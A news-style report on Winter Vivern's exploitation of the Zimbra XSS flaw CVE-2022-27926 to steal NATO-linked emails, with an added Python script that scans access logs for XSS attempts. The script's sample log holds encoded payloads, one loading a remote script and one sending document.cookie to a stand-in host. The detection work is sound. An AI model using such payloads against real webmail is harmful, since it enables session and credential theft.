Winter Vivern, a Russia-based threat group, has been exploiting a Zimbra vulnerability since last month to steal emails from NATO officials, military personnel, diplomats and government agencies.
According to reports, the group has also impersonated the websites of European agencies that fight cybercrime in order to distribute malware disguised as virus-scanner software. Researchers confirmed that the flaw being exploited is CVE-2022-27926, a reflected cross-site scripting (XSS) vulnerability in Zimbra Collaboration servers.
The threat actors abused these webmail servers to target NATO-affiliated individuals and organisations.
According to the investigation, a Winter Vivern attack begins with reconnaissance: the operators scan the target's webmail platform with the Acunetix vulnerability scanner to determine whether it is running an unpatched version.
Next, they send a phishing email to the targeted address, spoofing a sender connected to the victim's organisation so that the message appears authentic.
The email contains a link that exploits the flaw described above on the target's vulnerable Zimbra server; following it causes additional JavaScript payloads to be injected into the webmail page in the victim's browser.
These payloads steal data from the victim's Zimbra session, including usernames, passwords and cookies, which gives the attackers what they need to access the target's email account.
The injected JavaScript also mimics the webmail portal's own default scripts so that, when the user presses the return key to submit the login form, the resulting web request, with its username, password and tokens, is captured and harvested.
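The attack chain above leaves a trace on the server side: the phishing link carries the XSS payload in the request to the vulnerable Zimbra endpoint, so webmail access logs record it even though the payload executes in the victim's browser. The following script is an added example, not code from the original article or from any vendor; it scans combined-format access log lines for percent-encoded script injection markers in query parameters. The log lines, the endpoint path /public/example.jsp and the parameter name are constructed for illustration and are not the actual CVE-2022-27926 vector, which the article does not name.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines (Apache/nginx combined format). The path
# /public/example.jsp and the "name" parameter are made up for this example;
# they are not the real vulnerable Zimbra endpoint.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Apr/2023:10:12:01 +0000] "GET /zimbra/?client=preferred HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [01/Apr/2023:10:12:07 +0000] "GET /public/example.jsp?name=%3Cscript%20src%3D%22https%3A%2F%2Fexample.invalid%2Fa.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.12 - - [01/Apr/2023:10:12:30 +0000] "GET /public/example.jsp?name=%22%20onload%3D%22fetch('https://example.invalid/'%2Bdocument.cookie)%22 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.13 - - [01/Apr/2023:10:13:00 +0000] "GET /mail?loc=en_US HTTP/1.1" 200 777 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic markers of reflected-XSS payloads: script tags, inline event
# handlers, javascript: URIs, cookie theft, and dynamic loading of a second
# stage (the article describes exactly this kind of follow-on JS payload).
XSS_MARKERS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("cookie-access", re.compile(r"document\s*\.\s*cookie", re.I)),
    ("dynamic-load", re.compile(r"\b(?:fetch|eval|import)\s*\(", re.I)),
]


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so double-encoded payloads are visible."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return (path, [(param, marker_label), ...]) for one request target."""
    parts = urlsplit(target)
    hits = []
    # parse_qsl performs one round of decoding; fully_decode handles the rest.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        for label, pattern in XSS_MARKERS:
            if pattern.search(value):
                hits.append((name, label))
    return parts.path, hits


def find_xss_attempts(log_text):
    """Parse access-log text and return one finding per request whose query string matches a marker."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path, hits = inspect_target(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "path": path, "status": m["status"], "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in find_xss_attempts(SAMPLE_LOG):
        print(f'{finding["ip"]} {finding["path"]} ({finding["status"]}): {finding["hits"]}')
```

This is a triage heuristic, not a substitute for patching the Zimbra server: it only catches payloads that survive URL decoding, and an attacker can obfuscate further (HTML entities, string concatenation). Because the group blends legitimate portal JavaScript into its payload, detection on the request side is more reliable than signature-matching the delivered script. In a real deployment, pair it with the Acunetix scanner fingerprint in the same logs, since the article reports that scan as the first stage of the campaign.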
This development shows the effort the group has invested in more sophisticated tooling, which in turn makes its phishing campaigns simpler to run and more effective.
Other research also found that Winter Vivern embedded portions of the legitimate JavaScript that runs on the webmail portal into its payload, so that the malicious code blends in with normal activity and evades security detection.
With this access, the attackers can collect sensitive data from compromised mailboxes, maintain persistence to monitor a target's communications over an extended period, and use the compromised accounts to launch lateral phishing attacks against further organisations.